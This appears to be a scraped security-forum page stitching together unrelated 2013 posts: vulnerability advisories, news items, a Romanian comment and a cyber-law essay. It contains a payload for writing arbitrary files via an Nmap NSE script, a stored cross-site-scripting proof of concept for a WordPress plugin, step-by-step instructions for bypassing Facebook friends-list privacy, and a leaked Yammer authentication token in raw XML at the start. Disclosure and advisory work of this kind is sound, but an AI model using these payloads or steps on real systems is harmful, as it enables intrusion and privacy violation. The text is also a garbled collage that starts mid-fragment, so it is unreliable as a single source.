<authentication-token>9mP6fBnFfNlUvZGG0Bwt5nUPJBxmlRqoaG3bMiBsMqJ4nKtWKi1OLVKyMjQwsTQwNbPQUcpLLSnPL8pWsjI2NTe3NNdRSq0oyCyqBCoxNje1t DQ1sDSvBQCsgA8z</authentication-token> <uri>https://1-087.rt.yammer.com/cometd/</uri> </realtime> <feed-desc>jungletorch.com's public messages</feed-desc> <older-available>true</older-available> <followed-references> <followed-reference> <type>open_graph_object</type> <id>344060296338433</id> </followed-reference> </followed-references> <ymodules/> <requested-poll-interval>60</requested-poll-interval> </meta> <references> <reference> <type>thread</type> <web-url>https://www.yammer.com/jungletorch.com/#/Threads/show?threadId=289043199</web-url> <direct-message>false</direct-message> Connection: keep-alive Solution: ========= TLS/SSL is the recommended approach to prevent any eavesdropping during the data exchange. Search Engine bots crawling should be restricted from capturing sensitive URL parameters from user sessions. Also user notifications should be enabled if an authentication request is being performed through the HTTPS protocol. Furthermore, Resource Providers can limit the likelihood of a replay attack from a tampered request by implementing protocol`s Nonce and Timestamp attributes. The value of oauth_nonce attribute is a randomly generated number to sign the Client request, and the oauth_timestamp defines the retention timeframe of the Nonce. Insecure Storage of Secrets: Protecting the integrity of the Client Credentials and Token Credentials works fairly well when it comes to storing them on servers. The secrets can be isolated and stored in a database or file-system with proper access control, file permission, physical security, and even database or disk encryption. For securing Client Credentials on mobile application clients, follow security best practices for storing sensitive, non-stale data such as application passwords and secrets. Risk: ===== The security risk of this insecure Oauth implementation vulnerability is estimated as critical. Credits: ======== Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

Description : An arbitrary file upload vulnerability exists in the official Nmap Http-domino-enum-passwords NSE script. Author : Piotr Duszynski Source : Nmap Http-domino-enum-passwords File Upload ? Packet Storm Code : Trustwave SpiderLabs Security Advisory TWSL2013-025: Arbitrary File Upload Vulnerability in Official Nmap Http-domino-enum-passwords NSE script Published: 08/02/13 Version: 1.0 Vendor: Nmap (http://nmap.org/) Product: Nmap NSE script Version affected: Nmap 6.25 Product description: Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping). Finding 1: Arbitrary File Upload Vulnerability *****Credit: Piotr Duszynski @drk1wi of Trustwave SpiderLabs CVE: CVE-2013-4885 It is possible to write arbitrary files to a remote system, through a specially crafted server response for NMAP http-domino-enum-passwords.nse script (from the official Nmap repository). Example vulnerable command: nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp' Vulnerable code: ... local status, err = saveIDFile( ("%s/%s.id"):format(download_path, u_details.fullname), http_response.body ) ... This issue can be only exploited if the 'domino-enum-passwords.idpath' parameter is present. In order to bypass the second format string parameter "%s.id" and be able to write arbitrary files to the operating system the following payload should be appended to the first format string parameter value: "\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a" Fully functional exploit for this vulnerability is available in the Portspoof git repository. Remediation Steps: The vendor has released an official patch for this vulnerability. It is recommended to upgrade to Nmap 6.40. Revision History: 07/18/13 - Vulnerability disclosed to vendor 07/29/13 - Patch released by vendor 08/02/13 - Advisory published References 1. http://nmap.org/changelog.html About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Description : WordPress Usernoise plugin version 3.7.8 suffers from a cross site scripting vulnerability. Author : RogueCoder Source : WordPress Usernoise 3.7.8 Cross Site Scripting ? Packet Storm Code : Details ============================= Application: Usernoise ( http://usernoise.karevn.com/ ) Version: 3.7.8 (probably earlier versions as well) Type: Wordpress plugin Developer: Nikolay Karev ( http://karevn.com/ - http://profiles.wordpress.org/karevn/) Vulnerability: Unauthorized persistent cross-site scripting Description ================= Usernoise is a "just works" modal contact / feedback form. It became responsive starting from 3.5 release. You will not need to change even a line of code in your site. Vulnerability ================= The summary field is vulnerable to persistent cross site scripting, and the affected area is the Wordpress admin dashboard. The reason why this vulnerability exists is because the user input is not being properly handled when a feedback is submitted. It accepts any type of arbitrary code, including JavaScript, and when the content is displayed in the feedback section in the dashboard, all JavaScript code is executed causing a sever vulnerability with administrators as the target. Proof of Concept ================= <script>document.documentElement.innerHTML='RogueCoder was here';</script> Well done! Website looks great<script>console.log('RogueCoder was here');</script> Solution ================= Upgrade to plugin version 3.7.9 Timeline ================= 2013-07-15 - Informed developer through plugin section on wordpress.org 2013-07-16 - Informed developer through email 2013-07-17 - Fix released

Description : If you know a valid email address of a given Facebook user, you can find out who their friends are. Author : RogueCoder Source : Code : Blog post link : http://techielogic.wordpress.com/2013/08/04/facebooks-friends-list-disclosure-vulnerability/ Affected application: facebook.com Impact: Access to friends list, by bypassing the privacy settings Author: Bhavesh Naik It was JULY 17, 2013 when I discovered this little loophole and I submitted the vulnerability to facebook but then I wasn't on the 'Hall of Fame' and neither did I receive any sort of recognition, since I was told they are aware of such scenarios. Well without wasting much time, I will start with the PoC. Note : Prior to this you should know your friends email address. The following screenshot is the victims (your friend) privacy setting , it shows that nobody is allowed to see the friends list: Now the attack, visit http://facebook.com and select "Forgot your password?" There you will be prompted to enter the email address. Enter the victims email ID: You will see the following page: You will be prompted to enter a new email address. Enter any email ID not associated to facebook. Press 'Continue'. You will be asked as to how you want to recover your account. Click on 'Recover your account with help from friends' VOILA ! You see the friends list I was wondering, "What is the use of such privacy setting when it can be bypassed by abuse of other functionality?". Status: Unfixed. Reported: Yes

One-click login hands over keys to Gmail, Google Drive et al, says researcher The single-click Google account login for Android apps is a little too convenient for hackers, according to Tripwire's Craig Young, who has demonstrated a flaw in the authentication method. The mechanism is called “weblogin”, and basically it allows users to use their Google account credentials as authentication for third-party apps, without sharing the username and password itself: a token is generated to represent the user's login details. Young claimed the unique token used by Google's weblogin system can be harvested by a rogue app and then used to access all of the advertising's giants services as that user. To demonstrate the flaw at this month's Def Con 21 hacking conference in Las Vegas, Young created an Android app that asks for access to the user's Google account to display stocks from Google Finance. Assuming the user grants permission the app, it issues a token to access the requested data. The rogue app sends that token back to the hacker, who can paste it into a web session to access all of the user's Google services, said Young. That includes unrestricted access to Gmail, Google Drive, Google Calendar and so forth, even though the permission was only given for an Android app to access Google Finance, we're told. Users do have to give multiple permissions to the app first: to access local accounts; to access the network; and to kick off a web session accessing finance.google.com - the last bit being when the web-usable token is issued. But if the user is expecting integration with Google Finance, then none of that would surprise them. Handing over the keys to their Google Drive files would, however. Once the miscreant has a valid token then they could see their mark's search history, among other things. Young points out that should our victim happen to be a Google Administrator then the attacker could take control of the administered accounts, changing passwords, modifying privileges, etc. But they'll have to move fast - Google's automated scanning may not have noticed the app's behaviour (his rogue app was only removed from the Google Play app store following a complaint despite being clearly marked as a security test) but since being informed about the vuln in February the Chocolate Factory has been working to close the security hole. (The the PC World blog has more details on the bloke's research.) The flaw is typical of what happens when simplicity overtakes security in developers' order of priorities. It's unlikely that anyone but the most-dedicated spear-phisher would take advantage of a flaw like this, but its exposure reminds us to be aware of the permissions we grant – and keeps Google et al fixing flaws which shouldn't exist in the first place. ® Sursa TheRegister.co.uk

Black Hat Known For Research, Not Products Annual attendance at the 2013 Black Hat security conference has increased significantly in recent years. This year, more than 7,500 were in attendance, according to conference organizers. The hacking conference has been known for research that showcases high-profile attacks targeting hardware and software vulnerabilities. With attendance at its highest, there was a heightened need for security vendors to gain security professionals' attention on the expo floor. The following security firms appeared to be getting the lion's share of attention for the roles they play in network monitoring, malware detection and analysis capabilities. CrowdStrike Irvine, Calif.-based CrowdStrike, which sells "active defense" services and a threat intelligence platform, was getting interest from Black Hat attendees. The firm, founded by former McAfee executives George Kurtz and Dmitri Alperovitch, has preached the need for organizations to use active technologies to combat cybercrime rather than passive detection measures. CrowdStrike's cloud-based Falcon platform provides detection, attribution and a range of response actions, including deceptive tactics and other ways to disrupt targeted attacks. Dell The future of Round Rock, Texas-based Dell as a publicly traded company may be in doubt, but its presence in the security market is continuing to grow. Beginning in 2011, the company acquired SecureWorks for security services. The company also acquired network security vendor SonicWall and added Quest Software for IT management capabilities and AppAssure for secure backup. Last month, Dell rolled out its Dell Data Protection Protected Workspace brand PCs and unveiled an agreement with security vendor Invincea, which will ship a customized version of its secure virtual containers software to protect the browser and other applications from attack. Hewlett-Packard Palo Alto, Calif.-based Hewlett-Packard unveiled a big channel refresh in April and is readying a managed security services program. The company is attempting to widen its reach with its ArcSight security information and event management (SIEM) appliances and is actively recruiting partners for its Fortify software for application security. It's also reworking its TippingPoint line of intrusion prevention appliances. At Black Hat, the firm highlighted its data protection tools and network infrastructure security technologies to conference attendees. LogRhythm Boulder, Colo.-based LogRhythm is seen positively by many security analysts for its line of security information and event management appliances. At the core of the company's technology is its Advanced Intelligence engine, which performs the correlation and analysis of enterprise log data. Security experts have long pointed out the need for network security pros to monitor network logs to detect and contain suspicious activity before it becomes a serious problem. The company manages a reseller program through LogRhythm Connect and a program for managed security services providers, offering various deployment options. Solera Networks Network monitoring appliance maker Solera Networks was acquired by Blue Coat systems in May. The firm showed off the latest components of its security analytics and advanced threat protection platform at Black Hat. The company's appliance acts as a DVR for the network and competes against RSA NetWitness. Both appliances are coveted by forensics teams and incident responders who use them to conduct deep analysis on systems following a breach. In recent years, the firms have touted the ability to detect attacks in real time. Mandiant Alexandria, Va.-based Mandiant has raised more than a few eyebrows with its report in February that connected the Chinese government to a hacking group believed to be responsible for hundreds of targeted attacks. The company performs incident response services for businesses and government agencies. Mandiant was in active recruitment mode at Black Hat as well as showcasing its forensics and incident response platform to prospective clients. Palo Alto Networks Santa Clara, Calif.-based Palo Alto Networks has been seen by industry analysts as an innovative next-generation firewall (NGFW) vendor. The firm touts secure application enablement to control application-function usage across the corporate network. Its WildFire service uses a cloud-based sandbox to test suspicious files and monitor behavior in an attempt to identify new malware. The company competes in a market that has been consolidating. Sourcefire was acquired by Cisco Systems, and McAfee recently acquired Stonesoft. Both firms were seen as innovators in the NGFW market. Lastline Santa Barbara, Calif.-based malware detection startup Lastline was getting interest from Black Hat attendees. The firm sees itself as a competitor to FireEye, which touts a technology capable of detecting targeted attacks and zero-day threats. Lastline recently announced that it raised a $10 million round of funding. Its CEO is Jens Andreassen, a former executive at Fortinet, who helped build out that appliance vendor's channel program. In a recent interview with CRN, Andreassen said his company's approach would be channel friendly. Mocana Mobile device vulnerabilities and threats received a great amount of attention at Black Hat, and security experts say the vendors that are in place to capitalize on the interest are those that focus heavily on mobile data security and application control. San Francisco-based Mocana helps companies mobilize applications without the need for coding or a software development kit. The company can create an application container to enable a business to set and enforce corporate policies and control access to backend systems. Analysts at research firm Gartner told CRN that mobile security firms that will endure are innovating around application control and the idea of containerizing mobile applications to isolate corporate data from the mobile device itself. Accuvant Denver-based security firm Accuvant has touted a strong security research arm and incident response team that have presented at a variety of security conferences. In addition to consulting work, the firm provides managed security services and network monitoring. At Black Hat, the company's researchers presented on conducting forensics on embedded systems and exploiting smart grid systems. Researchers also discussed ways to defend against a pass-the-hash attack, a technique that uses a cryptographic hash collision to exploit authentication weaknesses to gain remote access to a server. AccessData Group Lindon, Utah-based AccessData Group is known for its e-discovery platform, but Chad Gailey, vice president of worldwide channel sales, said his firm is creating strong partnerships in the channel with Accuvant, IBM and others with its forensics tools. The company touts its SilentRunner network forensics software and other forensics tools for data collection. Its e-discovery software is used for processing, case review and management, and it also has a services arm for incident response, litigation and forensics. Gailey told CRN that the company's products combine to create a complete, end-to-end platform for handling security incidents. ESET Antivirus firm ESET, with its U.S. headquarters in San Diego, is playing in a crowded field of antivirus firms. The security firm focused on its enterprise software with its NOD32 antivirus, remote administrator server and console, and support of two-factor authentication. Black Hat attendees lined up to fire at a target in an attempt to win a small prize at the security vendor's booth. Sophos U.K.-based antivirus vendor Sophos wanted to stress the simplicity of its portfolio at the Black Hat conference by keeping its vendor booth void of much messaging. Company executives told CRN that its portfolio is easy to use and deploy, which is attractive to small and midsize businesses. The company recently unveiled a managed services program and added two new channel executives to help shape out its channel initiatives while it cloud-enables its entire portfolio. Sophos touts a complete package, with many of its core security capabilities in its unified threat management appliance. Foreground Security Lake Mary, Fla.-based Foreground Security attracted Black Hat attendees interested in learning more about its security consulting, training and services offerings. The company was also in recruitment mode, seeking penetration testers and other experts at the conference. Foreground said it helps both private and public sector firms conduct a risk analysis, to determine what systems and processes need improvements. The company also recently unveiled its virtual security operations center for hardening the network and around-the-clock traffic monitoring. In addition to penetration testing services, the firm conducts a user education training program. Sursa CRN.COM

Kaspersky Lab chief malware expert Alex Gostev explains why the security risks to mobile devices are increasing, with nearly all threats aimed at Android smartphones and tablets. Kaspersky Lab is detecting 5,000 new mobile threats every week, according to Gostev. The good news is that cybercriminals don't really know how to use the data they are stealing from infected devices at the moment. But that could quickly change, Gostev said. A large amount of mobile malware comes in the form of spyware and aggressive adware embedded in freely available mobile apps. SMS Trojans, designed to stealthily text premium rate phone numbers, also make up a significant amount of the malware detected by Kaspersky researchers. Gostev said the threat is likely to continue to increase as mobile use skyrockets. Video : CRN Articles Player Sursa CRN.com

Microsoft is warning users that their Windows Phone 8 and Windows Phone 7.8 devices could be easily tricked into revealing login credentials for corporate Wi-Fi access points secured with WPA2 protection. The vulnerability appears to build on a known security weakness in a Microsoft authentication protocol as well as the way Windows Phones connect to WPA2 networks. How it works Let’s say Bob works for Acme Inc. and you use a Nokia Lumia 920 as his work phone. Every day Bob’s phone automatically connects to the company’s Wi-Fi network, called ACME1, using WPA2 security. Whenever Bob’s phone sees a Wi-Fi network called ACME1, the handset assumes that this is his work network and attempts to make a connection. Now, let’s say that two blocks down the street there’s a café where a lot of ACME employees grab a latte on their lunch breaks. All a hacker would have to do is set-up a wireless router called ACME1 secured with WPA2 and wait for a Windows Phone to connect to the rogue access point. Once Bob walks in with his Nokia 920 with the Wi-Fi turned on, his phone will try to connect to the bogus ACME1 Wi-Fi network. During the phony authentication process, the hacker will be able to intercept the encrypted domain credentials stored in Bob’s phone. Now, that wouldn’t be a problem if Microsoft was using a cryptographic standard known to be resistant to attack, but Windows Phone uses an authentication protocol called PEAP-MS-CHAPv2 (Protected Extensible Authentication Protocol with Microsoft Challenge Handshake Authentication Protocol version 2) that packs some key cryptological weaknesses, which are exploited by this vulnerability. So after the hacker nabs Bob’s login credentials, the baddie can simply capitalize on the weak encryption to obtain Bob’s credentials and then login to the real ACME1 with the same user privileges as Bob. No patch incoming Microsoft says it has no plans for a patch to fix this issue as the problem is the fundamentally weak cryptography used in PEAP-MS-CHAPv2. (On the plus side, Microsoft says it doesn’t know of any examples of the weakness being actively used in the wild.) As a workaround, Microsoft is advising corporate IT departments to require Windows Phone devices to validate a Wi-Fi access point by checking its root certificate before attempting to connect. The other option, Microsoft says, is to turn off your phone’s Wi-Fi capabilities. Anyone who needs to learn how to secure their Windows Phone device can find detailed instructions on Microsoft’s Website. Sursa PCWorld.Com

Sa inteleg ca astia de la FBI, NSA s-au pus pe treaba de cand cu Snowden . De altfel era de asteptat ca ei vor interveni mai puternic in operatiunile de spionaj.. trebuie sa isi refaca imaginea si sa arate cine e sefu' din nou.

Channel 4 is the latest media organization fell victim to the Syrian Electronic Army hacktivist that target western media organizations. Channel 4 is a British public-service television broadcaster which began transmission on 2 November 1982. "#SEA hacks Channel 4 blog, but they hired an admin to stay up all night to try and stop us | http://channel4.com/blogs | hxxp://www.zone-h.org/mirror/id/20430814 …" The recent tweet from Syrian Electronic Army reads. We at EHN found that the Channel 4 Blog was using outdated wordpress version "Wordpress 3.1.2". The vulnerable word press version allowed hackers to deface the blog. The hacker also tweeted the admin panel of the Wordpress. At the time of writing, the site(blogs.channel4.com) displays the following error message " Sorry ...Something’s broken (or we’re making things better). Please come back and try again later." Sursa EHackingNews.Com

Part I : Here The consequence-based duo tests The focus of this contribution is placed on two tests which employ the consequence-based approach that, in turn, aims to categorize cyber attacks as a use/threat of force or an armed attack pursuant to UN Charter. Interestingly, such a method within the method reminds me ace little of the Russian matryoshka, where with each opening of a wooden doll the chance to snatch the final surprise is either getting bigger (while the dolls are decreasing in size) or vanishes thunderously at the end. 1. Pictet’s approach The author of the Commentary on the Geneva Conventions devised a test which relies on “scope, duration and intensity” factors in order to determine whether a use of force should be regarded as an armed attack. The evolvement of international instruments like the “Definition of aggression” resolution by U.N. General Assembly has been conducive to the application of Pictet’s approach. Without providing a clear definition of armed attack, it gives examples of internationally accepted practices which are considered or bear some close resemblance to the term in question. Nonetheless, many of those pronouncements are inapplicable in the event of cyber attacks, but the test created by Jean Pictet may prove somehow fruitful (Graham, 2010). Let’s put in a nutshell the constitutive parts of the test: Scope feature stands for the breadth of the attack, which analyses the weapon from one side and the target from another. Key points of study concerning the weapon and target are accordingly the number used or attacked and their nature. The sum of these findings determines the scope of the attack (Wingfield, 1999). Duration consists of quantitative and qualitative part and is probably the easiest component to evaluate. The quantitative one is related to either permanent or temporary effects ensuing from the attack. Consequently, if the effects are temporary, for the period they persist can be described in time values. As for the qualitative part, its purpose is to indicate for how long the attacked platform will be unavailable to the party (Wingfield, 1999). Intensity, in the context of this test, can be presented as a spectrum. At the one side are activities that have no effect on the attacked state, and at the other side are those operations that affect 100% of the object under attack. With drawing close to the center, this “mission permissive/mission coercive” dichotomy is growing gradually in terms of complexity. At the same time, it should be noted that not always the destruction of the object leads to the worst consequences. Indeed, a continuous receiving of manipulated data. For instance, from a compromised satellite may actually be more deleterious. Thus, intensity factor which examines properly the balance of real damage caused is useful (Wingfield, 1999). 2. Schmitt’s seven-factor scheme The state practice concerning applying the notion of use of force to cyber attacks is vague and ambiguous. However, according to Michael Schmitt, one of the strongest advocates of applying the consequence theory to cyber attacks, there is a scheme of factors that may prove useful when evaluating whether a cyber attack constitutes a use of force. This approach is something like a compromise variant, preserving the status quo of the states’ ability to make own assessment and choices based on them, but within the boundaries set out in the UN Charter. Schmitt claims that “the approach has generally withstood the test of time (Schmitt, 2011, p. 575). These factors are : Severity Without a doubt it is the most important criterion. This factors looks at the intensity and scope of an attack. Assessment under ‘severity’ would take into account the number of casualties, size of the attacked zone, and the figures which reflect on the damage inflicted. The greater the total sum of these values is, the more likely is the cyber attack to be treated as an armed attack (Sklerov, 2009). The same counts also if there is more harm inflicted on ‘critical national interests’. Consequently, because physical existence is at stake and this is the most valuable need among the all human needs. Therefore, ‘severe’ armed attacks are banned because they endanger in the utmost degree this supreme human need (Schmitt, 1999). “Only if a foreseeable consequence is to cause physical injury or property damage and even then, only if the severity of those foreseeable consequences resembles the consequences that are associated with armed coercion” is the situation when a cyber attacks is justified according to the former General Counsel of the CIA Daniel Silver (2002, p. 89). He infers as well that the main factor that should determine existence of a cyber attack is the severity of the damage caused. Immediacy This factor corresponds to ‘duration’ from the Pictet’s test and is also important because it indicates how long after the impact takes place the consequences emerge. The nature of cyber attacks frequently prepossesses in favour of swift emergence of attack effects, which decreases the chances for peaceful solution accordingly. By contrast, computer malware such as logic and time bombs raises serious concerns because they can stay dormant for a long time before being activated (Schmitt, 2011). Additionally, ‘immediacy’ as well engages in finding of what time is necessary for the effects to abate (Sklerov, 2009). Directness This index accentuates on the harm caused and the chain of logical events that leads to the causation of a cyber attack. While the immediacy criterion keeps track on the temporal issue, the directness is more interested in assessing the line of the events that would eventually lead from the act to the results: For example, an economic embargo may produce its final consequences much later than it has started. On the other hand, the armed actions usually cause the results directly after the conflict has begun. For instance, the result from air raid bombardment causes a wave of explosions that directly cause death/injury to people and damage/destruction of tangible objects (Schmitt, 2011). Negative consequences, which have more certain character, meaning that their occurrence is highly probable, are under the prohibition of use of force (Schmitt, 1999). Invasiveness A quantity which determines the depth of penetration in secured system. Greater penetration leads to higher value of invasiveness, which, in turn, trails the path to higher degree of use of force. If we use again the example above, the economic embargo may have a little penetration, like in the case when the economic ties with another state are simply severed, but in the armed incursion there is always a breach in another state’s territory. While in the first case there is no “use of force” action, in the second situation surely the use of force is a fact (Schmitt, 2011). Sovereignty, authority and prestige of a victim state may be impaired significantly in the event of unauthorized armed attacks that break in another’s country territory (Schmitt, 1999). Notwithstanding, owing to the borderless terrain of cyberspace, invasiveness criterion is hardly applicable. Indeed, one should apply this factor carefully in the event of cyber attack. The computer means often are used in the modern high-tech cyber exploitation and, as it has already been discussed in previous writings, the cyber exploitation seldom rises to a use of force even though it is highly invasive. Thus, actions of spying on the other governments’ computer systems are not regarded as a use of force (Schmitt, 2011). Measurability Simply said, it is a calculator of consequences in quantitative values — if the number of this factor is at the upper diapason, then the state’s interest is more likely to be undermined. In practice, the consequences of armed attack are easier to be gathered and evaluated, while the consequences of other kinds of coercion are difficult to measure. Thus, the international community, institutions, and laws are more willing to pursue the more evidential case (Schmitt, 1999). And here comes again the economic embargo example. Although it may cause significant suffering, the international law excludes it from the use of force. Conversely, an armed attack which inflicts the slightest harm qualifies undoubtedly. This is so because the correct measurement is difficult in the first scenario while in the second one the result is usually clear (Schmitt, 2011). Speculative damages certainly make a weak case that a cyber attack is in fact tantamount to a kinetic armed attack (Sklerov, 2009). Presumptive Legitimacy It is an unwritten rule that any use of violence is deemed illegitimate without any concrete provision to explicitly proclaim this for a fact. On the contrary, the other forms of coercion which are not explicitly forbidden are legitimate (Schmitt, 1999). The economic embargo is not considered a use of force and it is not banned at least by this provision. From this point, we can notice that if the act conducted via computer tools is not prohibited, then is presumptively legitimate (Schmitt, 2011). Furthermore, from the international community’s point of view, “the less a cyberattack looks like accepted state practice, the stronger the argument that it is an illegal use of force or an armed attack (Sklerov, 2009, p. 69).” Responsibility His original scheme has only six factors, but in 2011 Schmitt adds “responsibility” as a seventh indicator. This factor manifests when a state is responsible for a given cyber attack. The assessment is based on the degree of involvement. If a state is considerably implicated in a cyber attack, then it is more likely this act to be categorized as a use of force (Schmitt, 2011). Except for the involvement condition, however, a state must be recognized as a culprit with relation to a cyber attack that is duly attributed as well. Functioning of Schmitt’s seven-factor scheme Michael Schmitt explains briefly the purpose and benefits of this consequence scheme: These consequence commonalities can serve as ties between a cyber attack and the prevailing instrument-based prescriptive shorthand. By this scheme, one measures the consequences of a cyber attack against the commonalities to ascertain whether they more closely approximate consequences from a particular sort characterizing armed force or whether they are better placed outside the use of force boundary. This technique allows the force box to expand to fill lacunae (Schmitt, 1999). The Schmitt’s seven-factor scheme actually works by assessing the reasonably predictable consequences of a cyber attack and gauge them to the average results of an armed attack. If the former is similar to the latter, then the expansion of the use of force would be just. If they are not, then the act is beyond the ban on the use of force and if it is yet illegal should be prosecuted with the help of other legal mechanisms (Schmitt, 1999). Empirical application of Schmitt’s seven-factor scheme On the ground, Schmitt’s approach is being applied by the Pentagon’s officials, even though not against an actual cyber attack. The case in question had begun the summer of 2006 when the Pentagon lost its communication network in Central and North USA. Later on, the connection with the South U.S. central was lost, too. The reason for both telecommunication disruptions was an accidental miscalculation of the digging work on construction sites made by construction crew personnel. As a result, the communications were cut off for more than 36 hours. However, after applying comprehensively the Schmitt’s analytical scheme at the moment of the event, the Pentagon cyber division established that this incident is most probably not a cyber attack (Remus, 2011). Final thought on the two tests To conclude with a few words, the reviewed tests are direct application of the consequence-based methodology and as such they carry almost the same pros and cons innate to the approach in question. With this being so, it should be yet noted that each approach such as the Pictet’s three-features criteria and Schmitt’s seven-factor scheme is always likely to have a contribution on its own in filling gaps in theory and practice. Reference List Graham, D. (2010). Cyber threats and the law of war. Journal of National Security Law and Policy, 4, 87-104. Schmitt, M. (1999). Computer network attack and use of force in international law. Columbia Journal of Transnational Law, 37, 885-937. Schmitt, M. (2011). Cyber operations and the jus ad bellum revisited. Villanova Law Review, 56, 569-606. Silver, D.B. (2002). Computer network attack as a use f force under Article 2(4) of the United Nations Charter. International Law Studies, 73. Sklerov, M. (2009). Solving the dilemma of state responses to cyberattacks: A justification for the use of active for the use of active defences against states who neglect their duty to prevent. (Master’s Thesis, The Judge Advocate General’s School, USA) Resmus, T. (2011). Cyber attacks and international law of armed conflicts: A ‘jus ad bellum’ perspective. Journal of International Commercial Law and Technology, 7. Sursa Resources.InfoSecInstitute.com